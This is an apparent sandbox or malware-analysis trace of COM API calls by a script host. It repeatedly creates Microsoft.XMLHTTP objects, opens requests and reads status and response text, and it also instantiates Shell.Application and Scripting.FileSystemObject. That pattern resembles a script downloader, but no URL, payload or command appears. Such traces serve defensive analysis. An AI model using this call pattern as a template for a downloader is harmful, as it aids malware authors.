	[0415.031] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0416.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0416.681] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0416.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0416.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0416.681] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0416.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0416.681] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0416.681] SysStringLen (param_1=0x0) returned 0x0
	[0416.681] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0416.681] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0416.681] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0416.682] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0416.682] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0416.682] ??2@YAPEAX_K@Z () returned 0x62f350
	[0416.682] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0416.682] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0416.682] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0416.682] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0416.682] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0416.682] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0416.682] SysStringLen (param_1=0x0) returned 0x0
	[0416.682] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0416.685] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0416.685] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0416.685] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0416.685] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0416.685] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0416.686] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0417.578] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0417.578] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0417.578] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0417.579] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0417.579] SysStringLen (param_1=0x0) returned 0x0
	[0417.579] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0417.579] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0417.579] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0417.580] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0417.580] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b98) returned 0x0
	[0417.580] ??2@YAPEAX_K@Z () returned 0x62f310
	[0417.580] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b98, pUnkSite=0x62f310) 
	[0417.580] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0417.580] XMLHTTPRequest:IUnknown:Release (This=0x49c5b98) returned 0x0
	[0417.580] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0417.580] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0417.580] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0417.580] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0417.583] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0417.583] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0417.583] SysStringLen (param_1=0x0) returned 0x0
	[0417.583] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0417.583] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0417.583] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0417.583] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0417.583] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0417.583] ??2@YAPEAX_K@Z () returned 0x62f330
	[0417.583] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f330) 
	[0417.583] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0417.583] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0417.583] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0417.583] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0417.583] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0417.584] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0417.584] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0417.584] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0417.584] SysStringLen (param_1=0x0) returned 0x0
	[0417.584] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0417.584] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0417.584] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0417.584] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0417.584] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7258) returned 0x0
	[0417.584] ??2@YAPEAX_K@Z () returned 0x62f310
	[0417.584] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7258, pUnkSite=0x62f310) 
	[0417.584] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0417.585] XMLHTTPRequest:IUnknown:Release (This=0x49c7258) returned 0x0
	[0417.585] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0417.585] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0417.585] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0417.585] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0417.585] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0417.585] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0417.585] SysStringLen (param_1=0x0) returned 0x0
	[0417.585] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0417.585] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0417.585] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0417.585] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0417.585] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bc8) returned 0x0
	[0417.585] ??2@YAPEAX_K@Z () returned 0x62f330
	[0417.585] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bc8, pUnkSite=0x62f330) 
	[0417.585] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0417.586] XMLHTTPRequest:IUnknown:Release (This=0x49c5bc8) returned 0x0
	[0417.586] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0417.586] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0417.586] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0417.586] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0417.586] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0417.586] longjmp () 
	[0417.586] longjmp () 
	[0417.586] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0417.586] SysStringLen (param_1=0x0) returned 0x0
